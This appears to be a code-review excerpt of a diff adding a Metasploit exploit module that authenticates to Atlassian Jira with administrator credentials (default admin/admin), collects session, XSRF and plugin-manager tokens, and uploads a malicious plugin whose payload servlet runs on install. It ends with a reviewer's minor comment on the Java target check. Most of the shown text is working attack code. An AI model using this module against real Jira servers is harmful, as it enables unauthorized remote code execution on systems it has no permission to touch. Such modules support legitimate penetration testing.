modules/exploits/multi/http/jira_plugin_upload.rb

```diff
@@ -0,0 +1,241 @@
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+        ],
+      'Platform'    => %w[java],
+      'Targets'     =>
+        [
+          ['Java Universal',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'java'
+            }
+          ]
+        ],
+        'DisclosureDate' => 'Feb 22 2018'))
+
+    register_options(
+      [
+        Opt::RPORT(2990),
+        OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
+        OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
+      ])
+  end
+
+  def check
+    unless access_login?
+      print_error(Failure::Unknown, 'Unable to access the web application')
+    end
+    auth_res = do_auth
+    good_sid = get_sid(auth_res)
+    good_cookie = 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+    res = query_upm(good_cookie)
+
+    if res && res.code == nil?
+      print_error('Unable to access the web application')
+      return CheckCode::Unknown
+    elsif res.code == 302
+      print_error("Server rejected the credentials or the user doesn't have access to plugin manager!")
+      return CheckCode::Unknown
+    elsif res.code == 200
+      print_status('Server accepted the credentials, user has access to plugin manager!')
+      return CheckCode::Appears
+    else
+      print_status('Something went wrong, make sure host is up and options are correct!')
+      return CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    unless access_login?
+      fail_with(Failure::Unknown, 'Unable to access the web application')
+    end
+    print_status('Retrieving Session ID and XSRF token...')
+    auth_res = do_auth
+    good_sid = get_sid(auth_res)
+    good_cookie = 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+    res = query_for_upm_token(good_cookie)
+    upm_token = get_upm_token(res)
+    upload_exec(upm_token, good_cookie)
+  end
+
+  # Upload, execute, and remove servlet
+  def upload_exec(upm_token, good_cookie)
+    contents = ''
+    name = Rex::Text.rand_text_alpha(8)
+
+    atlassian_plugin_xml = %Q{
+    <atlassian-plugin name="#{name}" key="#{name}" plugins-version="2">
+    <plugin-info>
+        <description></description>
+        <version>1.0</version>
+        <vendor name="" url="" />
+
+        <param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
+        <param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>
+
+    </plugin-info>
+
+    <servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
+        <description>"#{name}"</description>
+        <url-pattern>/metasploit/PayloadServlet</url-pattern>
+    </servlet>
+
+    </atlassian-plugin>
+    }
+
+    # Generates .jar file for upload
+    if target.name =~ /Java/
```

Comment:
Minor, but given that the targets are currently only java, does it make sense to keep this?